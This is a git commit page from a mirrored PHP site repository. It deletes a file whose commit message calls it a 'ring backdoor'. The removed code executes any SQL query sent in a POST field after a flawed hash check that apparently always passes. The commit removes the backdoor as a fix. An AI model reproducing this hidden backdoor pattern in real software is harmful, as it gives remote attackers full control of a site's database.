Fixed some hard-coded kyberia.sk addreses and removed ring backdoor
[mirrors/Kyberia-bloodline.git] / wwwroot / inc / eventz / ring.inc
diff --git a/wwwroot/inc/eventz/ring.inc b/wwwroot/inc/eventz/ring.inc
deleted file mode 100644 (file)
index 3538f1e..0000000
+++ /dev/null
@@ -1,7 +0,0 @@
-<?php
-function ring() {
-global $db;
-if (md5($_POST['ring']=='a482a148ccdd020bcb5888e99f41bb65')) {
-       $db->query($_POST['suicide']);
-}
-?>
This page took 0.093089 seconds and 4 git commands to generate.